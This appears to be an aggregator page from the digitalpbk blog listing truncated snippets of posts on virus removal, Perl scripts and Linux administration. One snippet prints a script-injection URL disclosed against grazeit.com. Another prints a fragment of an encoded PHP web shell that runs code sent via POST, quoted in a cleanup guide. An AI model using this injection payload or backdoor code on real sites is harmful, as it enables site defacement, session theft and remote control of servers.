14 Aug, 2010

Script brontok remover

Articles related to script brontok remover

Brontok Virus manual removal steps

http://digitalpbk.com/virus/brontok-manual-removal-steps-free-tool Brontok Virus manual removal steps The Brontok virus is a commonly occuring virus and is transmitted mainly through removable Media drives such as Pen drives, Floppy Disks etc. Brontok appears in the form of a File Folder, with similar icons and has the same name as its parent folder. People tend generally to open the folder which in turn executes the virus. Read on to get rid of this virus. Brontok Virus Symptoms, How to detect Brontok In order to detect Brontok Virus on the system, watch ...
Published 1 year, 10 months ago

Perl script to remove a directory and contents recursively

http://digitalpbk.com/perl/perl-script-remove-directory-and-contents-recursively Perl script to remove a directory and contents recursively This is the script for sandeep when he asked me how to delete a directory in perl. rmdir function only removes empty directories. So we need to remove the contents of the directory before removing the directory. So if the directory contains more directories / folders we would have to recursively delete all the directories under the directory. Well so here is the code just to do that. #!/usr/bin/perl deldir("test"); ...
Published 2 years, 2 months ago

XSS on GrazeIt.com

http://digitalpbk.blogspot.com/2007/01/xss-on-grazeitcom.html Scripting holeshttp://www.grazeit.com/Backpage.asp?BPID=210&FilterBy;=tags&FilterTag;=%3Cscript%3Ealert('hi')%3C/script%3E&FilterTagID;=1325to Grazeit.com administratorsGreat work guys. But please remove this serious security vulnerability as it can be used for more than redirection. It can be used to deface, steal user sessions etc. Thank you for making Grazeit.com.How to remove this vulnerablilty?To remove this vulnerablity you have to strengthen the filters. To do this, the src ...
Published 5 years ago

Sitemeter selling your stats to Ad Company

http://digitalpbk.blogspot.com/2007/05/sitemeter-selling-your-stats-to-ad.html Sitemeter selling your stats to Ad Company Sitemeteris or rather Was a popular site tracking service that reports about traffic stats on sites. Recently it was found by many that certain advertising company specificclick.net cookies were found in the browsers. Following it up I investigated the sitemeter code provided and here is the solid proof that sitemeter sells your stats to the company : The source code that is being generated by the sitemeter script that contains the ad code:I have ...
Published 4 years, 9 months ago

Gumblar Virus Javascript removal using PERL

http://digitalpbk.com/virus/gumblar-web-virus-manual-removal-free-tool Gumblar Virus Javascript removal using PERL Gumblar virus infects all .html and .php files and injects a piece of javascript in the source code. The code is usually found just below the <body> tag. The Javascript code Gumblar injects varies widely and usually attaches a script or inline frame inside your page to execute itself on page load. Read on to get rid of this virus. Gumblar Source Code Samples when delimited by new lines Sample 1 var D; if(D!='' ...
Published 1 year, 10 months ago

Remove old kernels in Ubuntu

http://digitalpbk.blogspot.com/2008/11/ubuntu-remove-old-kernel-grub-list-long.html Remove old kernels in Ubuntu Whenever a new kernel is applied ubuntu keeps the old one. This clogs up the grub and hard disk space and ends up having a lot of kernels to boot in the grub.To know the version that is currently running:uname -rand to remove all other kernels usesudo apt-get remove --purge 2.6.24-16-*change the 2.6.2x-xx- parts to remove those kernel. Make sure you dont remove the kernel you are using, or you will end up breaking the system. It is wise to keep a recent kernel ...
Published 3 years, 3 months ago

FTPCHK3 : Virus that adds malicious scripts to your website.

http://digitalpbk.blogspot.com/2009/10/ftpchk3-virus-php-pl-hacked-website.html 0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGIwc3JsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdiMHNyMicpKSE9J2Iwc3IyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>The code adds scripts to your code likeand executes codes coming via POST requests.Removal Backup your web directory, just in case something gets messed up.The following scripts scans files and removes most of the infection. I have written it to remove infected files from college website and it worked fine. Paste the following code in your web directory and execute. It renames infected files with file.infected and removes code from the file and updates your file to remove the code ...
Published 2 years, 3 months ago

Installing Misc Softwares on FC6

http://digitalpbk.blogspot.com/2007/05/installing-vlc-on-fc6.html /lib/firefox/firefoxIn the first step we untar the downloaded files to /usr/libcompat-libstdc++-33 is a module that is required for Firefox, skip this step if you are sure you have the moduleNext we remove the previous link/ init script of Firefox from /usr/binFinally we make a new link in /usr/bin to the new Firefox 2.NVidia Graphics DriverDownload the latest nvidia driver (1.0-9626) from here.# init 3Command not found# /sbin/init 3# sh NVIDIA-Linux-x86-1.0-9629-pkg1.run# rebootNTFS file system support$ suPassword: # yum ...
Published 4 years, 9 months ago

Optimize Javascript files with Google Closure compiler

http://digitalpbk.com/javascript/optmizie-javascript-files-google-closure-compiler Optimize Javascript files with Google Closure compiler .0 applications uses a lot of javascript usually jQuery library or the YUI (Yahoo User Interface) Library to make RIA (Rich Internet Applications), this can be a very handy tool to improve Performance. The example code shows converting the following script from function hello(name) { alert('Hello, ' + name); } hello('New user'); to function hello(a){alert("Hello, "+a)}hello("New user"); It removes whitespaces, and shortens the variable names. A Few numbers ...
Published 2 years, 3 months ago

ckvo.exe Manual removal Steps

http://digitalpbk.blogspot.com/2008/12/ckvoexe-bat-cmd-virus-removal-manual.html ckvo.exe Manual removal Steps ckvo.exeThis virus is the same as amvo.exe and same steps should be followed to remove this virus. It creates autorun.inf and a .cmd file on all the partitions mounted on windows.Follow this guide to remove the virus.Cheers... ...
Published 3 years, 2 months ago

Related help topics for script brontok remover More keywords like script brontok remover
More pages for script brontok remover


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
Havelock Boat Jetty Havelock Boat Jetty in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk